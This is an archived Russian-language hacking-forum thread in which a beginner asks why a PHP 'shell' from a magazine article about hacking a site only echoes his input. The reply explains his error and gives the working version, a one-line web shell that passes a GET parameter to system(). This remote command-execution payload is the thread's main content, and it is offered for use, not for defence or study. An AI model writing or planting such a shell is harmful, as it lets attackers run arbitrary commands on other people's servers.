Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

открытый shell php

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Веб-программинг] >> открытый shell php
Имя
Сообщение << Старые топики   Новые топики >>
открытый shell php - 2007-12-20 10:43:28.126666   
vrazbros

Сообщений: 1
Оценки: 0
Присоединился: 2007-12-20 10:26:02.040000
 В август номере журнала пос взлому bigmir прочитал сдедующее. Если вставить в shell.php файл на сервере:
http://site/shell.php
&lt;?php &nbsp;&nbsp;&nbsp; isset($_GET[com])? print $_GET[com] : ''; ?&gt; то на сервере можно выполнить любую комманду.
пытаюсь сделать так:
http://site/shell.php?com=phpinfo()

выводит только
Notice: Use of undefined constant com - assumed 'com' in D:\….\shell.php on line 2
phpinfo()

или речь идет только если на сервере установлендвижок шаблонов, если протупил, просьба сильно не пинать.
Post #: 1
RE: открытый shell php - 2007-12-20 20:17:02.833333   
AdReNaL1Ne

Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
 Улыбнуло)

Даже если ты не умеешь читать по-английски: "Notice: Use of undefined constant com - assumed 'com' in D:\….\shell.php on line 2
phpinfo()", можно же логически порассуждать и понять, что переменная com не объявлена?

isset($_GET['com']) ? print $_GET['com'] : '';

И если уж это шелл, то правильно будет system($_GET['com'])
Post #: 2
Страниц:  [1]
Все форумы >> [Веб-программинг] >> открытый shell php







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.